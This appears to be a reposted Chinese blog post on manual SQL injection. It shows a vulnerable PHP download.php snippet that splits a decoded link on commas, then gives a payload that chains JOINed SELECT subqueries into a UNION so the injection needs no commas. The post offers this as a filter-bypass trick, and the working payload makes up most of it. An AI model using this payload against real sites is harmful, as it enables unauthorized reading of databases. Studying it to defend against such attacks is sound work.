注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

手工注入技巧 不用逗号进行UNION  

2015-01-07 16:04:34|  分类: SQL injection |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
手工注入技巧 不用逗号进行UNION - IversOn5 - IversOn5 blog
手工注入技巧 不用逗号进行UNION

./download.php

01 ...

02 if($link){    //加密后ID

03 $link = base64_decode(urldecode($link));

04 $link_array = explode(',', $link);    

05 if(is_array($link_array) && count($link_array)>0){

06 $url = $link_array[0];

07   $contentid = $link_array[1];

08 }

09 }else{    //实现地址

10 $contentid = $_GET['contentid'] ? $_GET['contentid'] : $_GET['id'];

11 }

12 ...

这种以逗号为分隔符的情况要想使用UNION查询不能使用常规方式。
构 造contentid为' UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e JOIN (SELECT 6)f JOIN (SELECT 7)g JOIN (SELECT 8)h JOIN (SELECT 9)i JOIN (SELECT 10)j JOIN (SELECT 11)k JOIN (SELECT 12)l JOIN (SELECT 13)m JOIN (SELECT 14)n JOIN (SELECT 15)o JOIN (SELECT 16)p JOIN (SELECT 17)q JOIN (SELECT 18)r JOIN (SELECT 19)s)#

这样就避免了逗号的出现。?



这篇文章是找了很久才找到的,很好啊
但是不知道作者是谁,在此转载了!!! 
 
  评论这张
 
阅读(56)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017